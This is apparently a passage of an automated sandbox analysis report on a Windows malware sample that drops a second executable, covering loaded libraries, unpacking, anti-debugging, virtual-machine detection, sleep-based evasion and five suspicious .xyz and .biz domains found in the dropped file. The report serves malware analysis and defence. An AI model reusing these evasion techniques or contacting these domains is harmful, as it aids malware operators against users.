                Source: unknownProcess created: C:\Users\user\Desktop\TN78WX7nJU.exe "C:\Users\user\Desktop\TN78WX7nJU.exe"
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeProcess created: C:\Users\user\AppData\Local\Temp\C455.tmp.exe "C:\Users\user\AppData\Local\Temp\C455.tmp.exe"
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1684
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeProcess created: C:\Users\user\AppData\Local\Temp\C455.tmp.exe "C:\Users\user\AppData\Local\Temp\C455.tmp.exe" Jump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeUnpacked PE file: 1.2.C455.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeUnpacked PE file: 0.2.TN78WX7nJU.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeUnpacked PE file: 1.2.C455.tmp.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0043DB77 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB7B
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_009BC1B2 push es; iretd 0_2_009BC1C3
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_009C056A pushad ; ret 0_2_009C0586
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_009C06E8 push ecx; ret 0_2_009C0705
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_009BDABC pushad ; ret 0_2_009BDAE4
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_009BDF5D push 00000003h; ret 0_2_009BDF61
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024909CD push ecx; ret 0_2_024909E0
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024B799F push esp; retf 0_2_024B79A7
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0249CE18 push ss; retf 0_2_0249CE1D
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0248FFF3 push ecx; ret 0_2_02490006
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024B7F9D push esp; retf 0_2_024B7F9E
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024B9DE8 pushad ; retf 0_2_024B9DEF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041ACF6 push esp; iretd 1_2_0041ACFF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043F6EE push esp; iretd 1_2_0043F6EF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043BF00 push eax; mov dword ptr [esp], 49484716h1_2_0043BF01
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A2C167 push eax; mov dword ptr [esp], 49484716h1_2_00A2C168
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A2F555 push esp; iretd 1_2_00A2F556
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0AF5D push esp; iretd 1_2_00A0AF66
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00AFDAD5 pushad ; ret 1_2_00AFDADA
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00AFDD5B push ebp; ret 1_2_00AFDD60
                Source: TN78WX7nJU.exeStatic PE information: section name: .text entropy: 7.543798990454789
                Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.371146835595198
                Source: C455.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.371146835595198
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeFile created: C:\Users\user\AppData\Local\Temp\C455.tmp.exeJump to dropped file
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeWindow / User API: threadDelayed 3458Jump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeWindow / User API: threadDelayed 6529Jump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-64410
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeAPI coverage: 5.1 %
                Source: C:\Users\user\Desktop\TN78WX7nJU.exe TID: 7380Thread sleep count: 3458 > 30Jump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exe TID: 7380Thread sleep time: -2496676s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exe TID: 7380Thread sleep count: 6529 > 30Jump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exe TID: 7380Thread sleep time: -4713938s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe TID: 7448Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeLast function: Thread delayed
                Source: Amcache.hve.7.drBinary or memory string: VMware
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000002.4215422078.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: C455.tmp.exe, 00000001.00000003.1985978022.0000000000B36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP;
                Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000002.4215422078.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`4
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043A9B0 LdrInitializeThunk,1_2_0043A9B0
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_009BAC43 push dword ptr fs:[00000030h]0_2_009BAC43
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024B00C6 mov eax, dword ptr fs:[00000030h]0_2_024B00C6
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0248092B mov eax, dword ptr fs:[00000030h]0_2_0248092B
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_02480D90 mov eax, dword ptr fs:[00000030h]0_2_02480D90
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F092B mov eax, dword ptr fs:[00000030h]1_2_009F092B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F0D90 mov eax, dword ptr fs:[00000030h]1_2_009F0D90
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00AFA963 push dword ptr fs:[00000030h]1_2_00AFA963
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024AA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024AA63A
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0249073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0249073A
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0248FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0248FB78
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024908CD SetUnhandledExceptionFilter,0_2_024908CD

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C455.tmp.exeString found in binary or memory: debonairnukk.xyz
                Source: C455.tmp.exeString found in binary or memory: diffuculttan.xyz
                Source: C455.tmp.exeString found in binary or memory: effecterectz.xyz
                Source: C455.tmp.exeString found in binary or memory: deafeninggeh.biz
                Source: C455.tmp.exeString found in binary or memory: immureprech.biz
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeProcess created: C:\Users\user\AppData\Local\Temp\C455.tmp.exe "C:\Users\user\AppData\Local\Temp\C455.tmp.exe" Jump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
